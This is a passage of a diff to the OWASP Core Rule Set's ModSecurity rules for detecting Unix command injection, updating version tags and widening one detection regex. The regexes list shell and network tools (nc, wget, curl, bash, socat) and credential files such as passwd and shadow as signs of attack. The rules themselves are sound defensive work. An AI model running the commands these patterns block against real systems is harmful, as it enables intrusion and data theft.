u(?:limit[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|p(?:2date[\s\x0b&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:ew[\s\x0b&\)<>\|]|gr|mdiff|pw|rsh|sudo)|olatility[\s\x0b&\)<>\|])|w(?:a(?:ll|tch)[\s\x0b&\)<>\|]|get|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:args|e(?:la)?tex|mo(?:dmap|re)|pad|term|z(?:c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more))|z(?:athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|s(?:oelim|td(?:(?:ca|m)t|grep|less)?)|ypper))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\x0b&\)<>\|]|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|nsible|pt(?:-get|itude[\s\x0b&\)<>\|])|r(?:ch[\s\x0b&\)<>\|]|ia2c)|s(?:cii(?:-xfr|85)|pell)|tobm)|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu)|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:a(?:ncel|psh)[\s\x0b&\)<>\|]|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|p(?:an|io|ulimit)|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab))|s(?:cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:psfilter|rl[\s\x0b&\)<>\|]))|d(?:(?:a(?:sh|te)|i(?:alog|ff))[\s\x0b&\)<>\|]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:2fsck|(?:asy_instal|va)l|cho[\s\x0b&\)<>\|]|fax|grep|macs|n(?:d(?:if|sw)|v-update)|sac|x(?:ec[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r)))|f(?:acter|(?:etch|lock|unction)[\s\x0b&\)<>\|]|grep|i(?:le(?:[\s\x0b&\)<>\|]|test)|(?:n(?:d|ger)|sh)[\s\x0b&\)<>\|])|o(?:ld[\s\x0b&\)<>\|]|reach)|ping|tp(?:stats|who))|g(?:awk[\s\x0b&\)<>\|]|core|e(?:ni(?:e[\s\x0b&\)<>\|]|soimage)|tfacl[\s\x0b&\)<>\|])|hci|i(?:mp[\s\x0b&\)<>\|]|nsh)|r(?:ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|p(?:6?tables|config)|spell)|j(?:ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|]|sshell)|l(?:a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|dconfig|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\x0b&\)<>\|]|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|z(?:4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ke[\s\x0b&\)<>\|]|ster\.passwd|wk)|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt[\s\x0b&\)<>\|]|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:a(?:no[\s\x0b&\)<>\|]|sm|wk)|c(?:\.(?:openbsd|traditional)|at)|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|(?:ice|ull)[\s\x0b&\)<>\|]|map|o(?:de[\s\x0b&\)<>\|]|hup)|ping|roff|s(?:enter|lookup|tat))|o(?:ctave[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:cman|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:f(?:la)?tex|ksh)|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|(?:ft|gre)p|hp(?:-cgi|[57])|i(?:(?:co|ng)[\s\x0b&\)<>\|]|dstat|gz)|k(?:exec|g_?info|ill)|opd|rint(?:env|f[\s\x0b&\)<>\|])|s(?:ed|ftp|ql)|tar(?:diff|grep)?|u(?:ppet[\s\x0b&\)<>\|]|shd)|wd\.db|y(?:thon[^\s\x0b]|3?versions))|r(?:ak(?:e[\s\x0b&\)<>\|]|u)|bash|e(?:a(?:delf|lpath)|(?:dcarpet|name|p(?:eat|lace))[\s\x0b&\)<>\|]|stic)|l(?:ogin|wrap)|m(?:dir[\s\x0b&\)<>\|]|user)|nano|oute[\s\x0b&\)<>\|]|pm(?:db|(?:quer|verif)y)|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:(?:ash|c(?:hed|r(?:een|ipt))|nap)[\s\x0b&\)<>\|]|diff|e(?:(?:lf|rvice)[\s\x0b&\)<>\|]|ndmail|t(?:arch|env|facl[\s\x0b&\)<>\|]|sid))|ftp|h(?:\.distrib|(?:adow|ells)[\s\x0b&\)<>\|]|u(?:f|tdown[\s\x0b&\)<>\|]))|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|udo|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|c(?:l?sh|p(?:dump|ing|traceroute))|elnet|ftp|ime(?:datectl|out[\s\x0b&\)<>\|])|mux|ouch[\s\x0b&\)<>\|]|r(?:aceroute6?|off)|shark)|u(?:limit[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|p(?:2date[\s\x0b&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:ew[\s\x0b&\)<>\|]|gr|mdiff|pw|rsh|sudo)|olatility[\s\x0b&\)<>\|])|w(?:a(?:ll|tch)[\s\x0b&\)<>\|]|get|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:args|e(?:la)?tex|mo(?:dmap|re)|pad|term|z(?:c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more))|z(?:athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|s(?:oelim|td(?:(?:ca|m)t|grep|less)?)|ypper))" \ "id:932235,\ phase:2,\ block,\ @@ -45,7 +45,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -66,7 +66,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -86,11 +86,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\})|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\}|\[.*\])|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \ "id:932130,\ phase:2,\ block,\ @@ -106,7 +106,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -126,11 +126,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|x)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|[ckz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dg]|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\s\x0b&\)<>\|]" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 